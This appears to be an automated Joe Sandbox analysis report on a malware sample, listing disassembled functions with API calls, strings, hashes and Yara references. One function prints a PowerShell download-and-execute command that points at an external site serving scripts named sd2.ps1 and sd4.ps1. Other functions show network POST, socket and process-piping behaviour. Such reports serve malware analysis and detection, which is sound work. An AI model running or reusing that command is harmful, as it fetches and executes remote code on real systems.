Instruction Fuzzy Hash: 26C1D671E002959BDB1CEBB6CC89AAF7FB9BF54340F100559E486A7291EF74AD04CB90

Function 005E6830 Relevance: 52.7, APIs: 27, Strings: 3, Instructions: 230
memorynetworkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON(00000000,?,?), ref: 005E6852
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 005E6872
GetProcessHeap.KERNEL32(00000008,00000000), ref: 005E688B
HeapAlloc.KERNEL32(00000000), ref: 005E6892
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 005E68B3
InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005E68D8
InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 005E6911
InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005E692E
HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 005E6967
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 005E6990
InternetSetOptionW.WININET(00000000,0000001F,00003180,00000004), ref: 005E69AA
HttpSendRequestW.WININET(00000000,Content-Type: application/octet-streamContent-Encoding: binary,000000FF,?,?), ref: 005E69BE
InternetQueryDataAvailable.WININET(00000000,00000000,00000000,00000000), ref: 005E69E0
GetProcessHeap.KERNEL32(00000008,00000000), ref: 005E69F9
HeapAlloc.KERNEL32(00000000), ref: 005E6A00
GetProcessHeap.KERNEL32(00000008,?,00000000), ref: 005E6A0B
HeapReAlloc.KERNEL32(00000000), ref: 005E6A12
InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 005E6A26
InternetCloseHandle.WININET(00000000), ref: 005E6A48
InternetCloseHandle.WININET(00000000), ref: 005E6A53
InternetCloseHandle.WININET(00000000), ref: 005E6A59
GetProcessHeap.KERNEL32(00000000,?), ref: 005E6A8C
HeapFree.KERNEL32(00000000), ref: 005E6A8F
GetProcessHeap.KERNEL32(00000000,?), ref: 005E6A9B
HeapFree.KERNEL32(00000000), ref: 005E6A9E
GetProcessHeap.KERNEL32(00000000,?), ref: 005E6AAA
HeapFree.KERNEL32(00000000), ref: 005E6AAD

Strings

POST, xrefs: 005E6961
Content-Type: application/octet-streamContent-Encoding: binary, xrefs: 005E69B8
`, xrefs: 005E68E8

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: Heap$Internet$Process$AllocCloseFreeHandleOption$ByteCharHttpMultiOpenQueryRequestWide$AgentAvailableConnectDataFileObtainReadSendStringUser
String ID: Content-Type: application/octet-streamContent-Encoding: binary$POST$`
API String ID: 2744214989-3343008755
Opcode ID: 56156ea731aea4129c7e665cd9320fe819219aeeca2e0b7f57f265c073756786
Instruction ID: 7c588cde2b339bf559ca813578adfccb4351d07414f339d69fb983f83907df6e
Opcode Fuzzy Hash: 56156ea731aea4129c7e665cd9320fe819219aeeca2e0b7f57f265c073756786
Instruction Fuzzy Hash: E3719271E40259ABEB189B95CC89FAF7AB8BF14791F104019FA41F7290DBB0AD049B64

Function 00F03670 Relevance: 42.4, APIs: 4, Strings: 20, Instructions: 354
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F031C0: task.LIBCPMTD ref: 00F032A1
Part of subcall function 00F031C0: task.LIBCPMTD ref: 00F032B0

task.LIBCPMTD ref: 00F03748

Part of subcall function 00F03410: task.LIBCPMTD ref: 00F0342D
Part of subcall function 00F03410: task.LIBCPMTD ref: 00F03435
Part of subcall function 00F03410: task.LIBCPMTD ref: 00F0343D

Part of subcall function 00F03450: task.LIBCPMTD ref: 00F03522
Part of subcall function 00F03450: task.LIBCPMTD ref: 00F03531

Part of subcall function 00F03640: task.LIBCPMTD ref: 00F03653

Part of subcall function 00F02A80: task.LIBCPMTD ref: 00F02A8A

Part of subcall function 00F02B80: task.LIBCPMTD ref: 00F02C4A
Part of subcall function 00F02B80: task.LIBCPMTD ref: 00F02C59

task.LIBCPMTD ref: 00F038A7

Part of subcall function 00F02D00: task.LIBCPMTD ref: 00F02D8B
Part of subcall function 00F02D00: task.LIBCPMTD ref: 00F02D97
Part of subcall function 00F02D00: task.LIBCPMTD ref: 00F02DA3
Part of subcall function 00F02D00: task.LIBCPMTD ref: 00F02DB2

Part of subcall function 00F01BC0: task.LIBCPMTD ref: 00F01CB3
Part of subcall function 00F01BC0: task.LIBCPMTD ref: 00F01CC2

Part of subcall function 00F01DD0: task.LIBCPMTD ref: 00F01E73
Part of subcall function 00F01DD0: task.LIBCPMTD ref: 00F01E82

Part of subcall function 00F01FE0: task.LIBCPMTD ref: 00F02065
Part of subcall function 00F01FE0: task.LIBCPMTD ref: 00F02074

Part of subcall function 00F021D0: task.LIBCPMTD ref: 00F022AD
Part of subcall function 00F021D0: task.LIBCPMTD ref: 00F022BC

task.LIBCPMTD ref: 00F03B39

Part of subcall function 00F027E0: task.LIBCPMTD ref: 00F02805

task.LIBCPMTD ref: 00F03BD3

Strings

qwqygrhgjnlaslbxrtpkmtdkuotavmzczxrpxcrwtsmbsjlrxtrernmpidlygcejepskuuax, xrefs: 00F037F2
erlehkqeoafjbbakngeamygibfibycnzoxdforwfarpfohjilxvtqpjhokuhneptpradfswisqtlicj, xrefs: 00F03773
uxxztqzgwwuzqaevnavsfydrh, xrefs: 00F03900
qdgrecqxaamyajazrwulmwar, xrefs: 00F036A3
gvnzsipipcghsiqztwv, xrefs: 00F0378C
nifwxqeymajpfnuvadyfsnxaotjoosfbtarwsxjgymiautkdtuhcyuvwolhqwuiwfzovgmpyzzdzptdmlxywmmmznckxkgrsxp, xrefs: 00F039C2
auflmecuefrwdklytrcnktmoa, xrefs: 00F039A6
lypanvubxxcyflbridlqlwfpuobrhtkfaezqbqqgqatvjqttkwfgnihfgahkdazhgbiobfwxbdqur, xrefs: 00F03A37
bgwayqjocvuljtzygwhgunsoeayvlexsooubzvltluxjsxepesiiyrsulnbbmvdoze, xrefs: 00F03A65
mszimdsmagcsvicmxoepfxhbkeaeo, xrefs: 00F037C6
mwwmnyrbpxfpxjumsjlgssbxzxlncpuuhqqfqubyiwnlmenhguxbklwzqksybicmwyiuxzuesoaeeyphcvwrprhqsvetlce, xrefs: 00F03946
hwlbdurvyvvqldatflklohusonaqpzyyypeogrlsqivrfmncjpytgjrvdojhcszsnyfnrzawzrhb, xrefs: 00F036D4
pdhbkyhzkmcfitopomizjflnklirmfrrzkmwtaywnbldpzvwnxwmu, xrefs: 00F03757
cct, xrefs: 00F03BA3
eayhpemxuutcdhjelpkfaiddjsblupzguucsjdwrhyqfvqahegmpewibrwjckldgxuwebokbvp, xrefs: 00F03B7F
xnolhfqebbnrgeazvflldahutuuqsgqykleatodisqmzdvbalgus, xrefs: 00F03B46
kiaoobdghby, xrefs: 00F03928
pfytwtrjvw, xrefs: 00F038E7
wmjkzdvgppomvnsashxqdbacmylifgmxhbtqsqswhznyf, xrefs: 00F038CB
jlwhzwxcgwxeqybcsimiysboffbjhvvezemcirfkbg, xrefs: 00F03813

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: task
String ID: auflmecuefrwdklytrcnktmoa$bgwayqjocvuljtzygwhgunsoeayvlexsooubzvltluxjsxepesiiyrsulnbbmvdoze$cct$eayhpemxuutcdhjelpkfaiddjsblupzguucsjdwrhyqfvqahegmpewibrwjckldgxuwebokbvp$erlehkqeoafjbbakngeamygibfibycnzoxdforwfarpfohjilxvtqpjhokuhneptpradfswisqtlicj$gvnzsipipcghsiqztwv$hwlbdurvyvvqldatflklohusonaqpzyyypeogrlsqivrfmncjpytgjrvdojhcszsnyfnrzawzrhb$jlwhzwxcgwxeqybcsimiysboffbjhvvezemcirfkbg$kiaoobdghby$lypanvubxxcyflbridlqlwfpuobrhtkfaezqbqqgqatvjqttkwfgnihfgahkdazhgbiobfwxbdqur$mszimdsmagcsvicmxoepfxhbkeaeo$mwwmnyrbpxfpxjumsjlgssbxzxlncpuuhqqfqubyiwnlmenhguxbklwzqksybicmwyiuxzuesoaeeyphcvwrprhqsvetlce$nifwxqeymajpfnuvadyfsnxaotjoosfbtarwsxjgymiautkdtuhcyuvwolhqwuiwfzovgmpyzzdzptdmlxywmmmznckxkgrsxp$pdhbkyhzkmcfitopomizjflnklirmfrrzkmwtaywnbldpzvwnxwmu$pfytwtrjvw$qdgrecqxaamyajazrwulmwar$qwqygrhgjnlaslbxrtpkmtdkuotavmzczxrpxcrwtsmbsjlrxtrernmpidlygcejepskuuax$uxxztqzgwwuzqaevnavsfydrh$wmjkzdvgppomvnsashxqdbacmylifgmxhbtqsqswhznyf$xnolhfqebbnrgeazvflldahutuuqsgqykleatodisqmzdvbalgus
API String ID: 1384045349-3352526687
Opcode ID: ca584bd06b18e7efb4569ffd1188ec691f9c44a45e2c1d1b5509d6ed0631f596
Instruction ID: 716503a53f598130393ca2648dce35b1c52a3d46c578c3089b8dbc5313b86c7d
Opcode Fuzzy Hash: ca584bd06b18e7efb4569ffd1188ec691f9c44a45e2c1d1b5509d6ed0631f596
Instruction Fuzzy Hash: 86E13D70E507089AD700FF78DD1679EBBB6BB06B90F404219F5453E1C1EFB11685AB92

Function 00F023F0 Relevance: 35.2, APIs: 13, Strings: 7, Instructions: 215COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 00F0252A
task.LIBCPMTD ref: 00F02539

Strings

duokwoniipliaktpcumxirsegoopnpgqtpzdmrgqunqsuxltfargaoyfbibqgre, xrefs: 00F0242B, 00F02571, 00F02597
S, xrefs: 00F02549
hczcjatmoheclnpwaqmeqzj, xrefs: 00F0247E, 00F026BB, 00F026E1
cghngzwziwanmbszqlbunzalhundohfsmgyjluxqyswlptwwjdpgxtza, xrefs: 00F0246A
xkmhkueozjyetdrqi, xrefs: 00F0248F
gjeerdbceuzsmkxmsxiomvcavimwsztwserhzklmfwksvuzqomelhhgekpjekv, xrefs: 00F0244F, 00F024CC, 00F024F2, 00F02616, 00F0263C
ayufwgulvuygbab, xrefs: 00F02760

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: task
String ID: S$ayufwgulvuygbab$cghngzwziwanmbszqlbunzalhundohfsmgyjluxqyswlptwwjdpgxtza$duokwoniipliaktpcumxirsegoopnpgqtpzdmrgqunqsuxltfargaoyfbibqgre$gjeerdbceuzsmkxmsxiomvcavimwsztwserhzklmfwksvuzqomelhhgekpjekv$hczcjatmoheclnpwaqmeqzj$xkmhkueozjyetdrqi
API String ID: 1384045349-3540177847
Opcode ID: b94e5f8edd2425800532bc021216919892ca367b18fb0cf74bbd460e98b98101
Instruction ID: cd29328b496e2c23315196fe88505d4b295583d5e8834758bf59c5bb665cd9a4
Opcode Fuzzy Hash: b94e5f8edd2425800532bc021216919892ca367b18fb0cf74bbd460e98b98101
Instruction Fuzzy Hash: 70B11570D04268DAEB64EB64CD55BEDBBB4AB01300F5081D9E149B7282DB745F88FF61

Function 005E8900 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 69stringCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 005E8921
ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 005E8934
ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 005E8947
GetFileAttributesW.KERNEL32(?), ref: 005E896D
GetFileAttributesW.KERNEL32(?), ref: 005E8986
lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 005E899D
wnsprintfW.SHLWAPI ref: 005E89C0
ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 005E89E2

Strings

%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe, xrefs: 005E892F
sd2.ps1, xrefs: 005E8978
%ComSpec%, xrefs: 005E8942
/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')", xrefs: 005E89AF
sd4.ps1, xrefs: 005E8991
%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe, xrefs: 005E891C
open, xrefs: 005E89DB
https://lacasadelverde.com/css, xrefs: 005E89AA

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings$AttributesFile$ExecuteShelllstrcpywnsprintf
String ID: %ComSpec%$%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe$%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe$/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"$https://lacasadelverde.com/css$open$sd2.ps1$sd4.ps1
API String ID: 4132772799-372348506
Opcode ID: a1d786a384e8b7ff7300ce8a1856e96492177015d43ac3e30481172e1d4fc3d9
Instruction ID: ba87fd0dbf696950b780546ee0df15c085ea025adbc7d4747f23285ccf734d41
Opcode Fuzzy Hash: a1d786a384e8b7ff7300ce8a1856e96492177015d43ac3e30481172e1d4fc3d9
Instruction Fuzzy Hash: C2219371D4065CAAEB28D7A58C45FFA7B6CBB04714F0005D2F6D8E20D1DBB06A888F95

Function 005E5850 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 167memorypipeprocessCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32(?,?,?,00000000), ref: 005E5883
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E58E1
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E58F4
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E58F9
WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E5910
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E5927
ReadFile.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E5964
GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E598F
HeapAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E5992
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E599D
HeapReAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E59A0
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E59F7
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E5A13
CloseHandle.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E5A18

Strings

D, xrefs: 005E58A6

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: CloseHandleHeap$PipeProcess$AllocCreateNamedPeek$FileObjectReadSingleWait
String ID: D
API String ID: 2337985897-2746444292
Opcode ID: 82f06362d5392f20fa721e7e1e480e5e811e957e80bf77cd6808b49800a2d660
Instruction ID: 09e12fc73b04d0b3ca66315723ed7658052bd0ee910085cb924709128f447889
Opcode Fuzzy Hash: 82f06362d5392f20fa721e7e1e480e5e811e957e80bf77cd6808b49800a2d660
Instruction Fuzzy Hash: BC51D470A00299AFEB248FA5DC88BEFBFB9FF44315F104465E994E7290E7709804CB60

Function 00F031C0 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 147COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 00F032A1
task.LIBCPMTD ref: 00F032B0

Strings

mvfhugfzhjaxvbknnhrjilxlfyzwtcfeenffipnrifprrliuzcjwulczesnckfzhjp, xrefs: 00F031F8
*, xrefs: 00F032BD
wgn, xrefs: 00F033B0
zaiptbmxvlxmaeyxfahlfgzodoaaorzwxdwlcbbswmzrxpgsvwdogtygmxrtlyfffezpl, xrefs: 00F0321D, 00F03258, 00F03275, 00F03323, 00F03343
wcgwprfuhsreihulyoxaptokhjbbumrzzfonukijjmhyytfdjnxxratsclpujhtohnz, xrefs: 00F0320C
7, xrefs: 00F032E2
Q, xrefs: 00F03307
D, xrefs: 00F03394

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: task
String ID: *$7$D$Q$mvfhugfzhjaxvbknnhrjilxlfyzwtcfeenffipnrifprrliuzcjwulczesnckfzhjp$wcgwprfuhsreihulyoxaptokhjbbumrzzfonukijjmhyytfdjnxxratsclpujhtohnz$wgn$zaiptbmxvlxmaeyxfahlfgzodoaaorzwxdwlcbbswmzrxpgsvwdogtygmxrtlyfffezpl
API String ID: 1384045349-950991828
Opcode ID: 773d84aa2788275d19176bba2389daa16b7278f58ce468fc0a032c59c79b95f1
Instruction ID: b9ced6e827b2f30ec9f0154395ef86b8d96bf619c47bff2d0c3b7ba3631a07e7
Opcode Fuzzy Hash: 773d84aa2788275d19176bba2389daa16b7278f58ce468fc0a032c59c79b95f1
Instruction Fuzzy Hash: 6A614670D04258CADB14DFA8CD557EEBBB9BB04304F1081A9E409BB2C2DB759B85FB91

Function 005E7570 Relevance: 22.6, APIs: 15, Instructions: 131memorynetworkthreadCOMMON

Download Yara Rule

APIs

inet_pton.WS2_32(00000002,?,?), ref: 005E7583
htons.WS2_32(?), ref: 005E758E
socket.WS2_32(00000002,00000001,00000006), ref: 005E75A6
connect.WS2_32(00000000,?,00000010), ref: 005E75C4
recv.WS2_32(00000000,?,00000002,00000000), ref: 005E75DC
GetProcessHeap.KERNEL32(00000008,00000024), ref: 005E75FD
HeapAlloc.KERNEL32(00000000), ref: 005E7600
CreateThread.KERNEL32(00000000,00000000,Function_00006410,00000000,00000000,00000000), ref: 005E767B
CloseHandle.KERNEL32(00000000), ref: 005E7686
recv.WS2_32(00000000,?,00000002,00000000), ref: 005E769E
closesocket.WS2_32(00000000), ref: 005E76AD
GetProcessHeap.KERNEL32(00000000,?), ref: 005E76B6
HeapFree.KERNEL32(00000000), ref: 005E76B9
GetProcessHeap.KERNEL32(00000000,00000000), ref: 005E76D3
HeapFree.KERNEL32(00000000), ref: 005E76D6

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: Heap$Process$Freerecv$AllocCloseCreateHandleThreadclosesocketconnecthtonsinet_ptonsocket
String ID:
API String ID: 2784442062-0
Opcode ID: 9006c8f48dceb45d7c494fab0d47777123a87492c0795026b4789f98e4dc4c07
Instruction ID: 2135069263c7654b2bf21819227364b6526d3234c346f587e54aa8da5d5fb7aa
Opcode Fuzzy Hash: 9006c8f48dceb45d7c494fab0d47777123a87492c0795026b4789f98e4dc4c07
Instruction Fuzzy Hash: F341F674A047C96AE72C4F7A8C89B6B3F68BF18716F040058FA81DF1D1D7709845D7A4

Function 00F021D0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 140COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 00F022AD
task.LIBCPMTD ref: 00F022BC
task.LIBCPMTD ref: 00F0232E
task.LIBCPMTD ref: 00F0233D

Strings

xwsxrlmzs, xrefs: 00F02213, 00F022E5, 00F02302
6, xrefs: 00F02394
Z, xrefs: 00F0236F
E, xrefs: 00F022C9
d, xrefs: 00F0234A
dsjeagbelkgqcwpmepfckbptdwhhxxjtlspkxngcfukuyvsbhwvhrzguybcubpflwcttrjukrdntfebinbhhiaqsgnumfjvx, xrefs: 00F02253, 00F02264, 00F02281

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: task
String ID: 6$E$Z$d$dsjeagbelkgqcwpmepfckbptdwhhxxjtlspkxngcfukuyvsbhwvhrzguybcubpflwcttrjukrdntfebinbhhiaqsgnumfjvx$xwsxrlmzs
API String ID: 1384045349-1131196702
Opcode ID: db37b4962d10f62e8f0632bbce2ba18717c521d3e0a01c845adfcd6650f21fbd
Instruction ID: 80ae533f7aac93dfcf129ca2dee2124318c88b2d10ac4f2ea9fc20f95b83cdac
Opcode Fuzzy Hash: db37b4962d10f62e8f0632bbce2ba18717c521d3e0a01c845adfcd6650f21fbd
Instruction Fuzzy Hash: 5E514530D0429CCADB10DFA8C9557EDBBB4BF05304F108159D409BB2C2DBB95A89FB61

Function 00F01DD0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 140COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 00F01E73
task.LIBCPMTD ref: 00F01E82

Strings

&, xrefs: 00F01F70
+, xrefs: 00F01EAF
=J, xrefs: 00F01F8C
W, xrefs: 00F01E8F
6, xrefs: 00F01ECF

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: task
String ID: &$+$6$=J$W
API String ID: 1384045349-2096352046
Opcode ID: 879e82b47c1a71ad6cc82be205fbacc476ae8d7f8be29a9c1c62d16ed710df15
Instruction ID: b4f362afe0879aec9ca65da21b7148f9fe674639de65d4786d9bc69f9c6fcad7
Opcode Fuzzy Hash: 879e82b47c1a71ad6cc82be205fbacc476ae8d7f8be29a9c1c62d16ed710df15
Instruction Fuzzy Hash: DB516771D0425CDADB24DFA8D985BEEBBB5BF04304F108159E805BB2C1DB78AA48FB51

Function 00F01BC0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 135COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 00F01CB3
task.LIBCPMTD ref: 00F01CC2

Strings

), xrefs: 00F01D19
wsjzsxnfmygsdnpewkoqbnspsl, xrefs: 00F01C0F, 00F01C6A, 00F01C87
csbmzcyumqprcesgqvrbiqvieamoc, xrefs: 00F01C59
&, xrefs: 00F01CF4
$, xrefs: 00F01CCF

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: task
String ID: $$&$)$csbmzcyumqprcesgqvrbiqvieamoc$wsjzsxnfmygsdnpewkoqbnspsl
API String ID: 1384045349-920653587
Opcode ID: 50303d145aacf56d3e4c520505ce1135346e921dd673be4f09f762cf4010ef64
Instruction ID: fc56b7b3ad118ee2f8803dc572f1b34918a49bcb5c053b9a0f78a32ccfdc5115
Opcode Fuzzy Hash: 50303d145aacf56d3e4c520505ce1135346e921dd673be4f09f762cf4010ef64
Instruction Fuzzy Hash: FE515970D0569CCAEB14DFA8C9557EEBBB0BF15304F108259E406BB2C1DB789A89FB41

Function 00F03450 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 125COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 00F03522
task.LIBCPMTD ref: 00F03531
task.LIBCPMTD ref: 00F035A3
task.LIBCPMTD ref: 00F035B2

Strings

=, xrefs: 00F035DF
<, xrefs: 00F0353E
M, xrefs: 00F035BF
0`, xrefs: 00F035FB
xubyndzhfgkyolyjftysvciojnmqkiuylaiuaozgbzivnsajwdwckwqlrikkokfgwivcmckrldruifkdvqnugkamweifj, xrefs: 00F0348C, 00F034D9, 00F034F6, 00F0355A, 00F03577

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: task
String ID: 0`$<$=$M$xubyndzhfgkyolyjftysvciojnmqkiuylaiuaozgbzivnsajwdwckwqlrikkokfgwivcmckrldruifkdvqnugkamweifj
API String ID: 1384045349-2568968963
Opcode ID: b48277ebeaeaadb695b49cd12fad078549f27e4fd7ef55dcd958bdaeed888809
Instruction ID: ffa8728284f9e3c9906fb536920a9986864113720b77ba616081cfa86660849c
Opcode Fuzzy Hash: b48277ebeaeaadb695b49cd12fad078549f27e4fd7ef55dcd958bdaeed888809
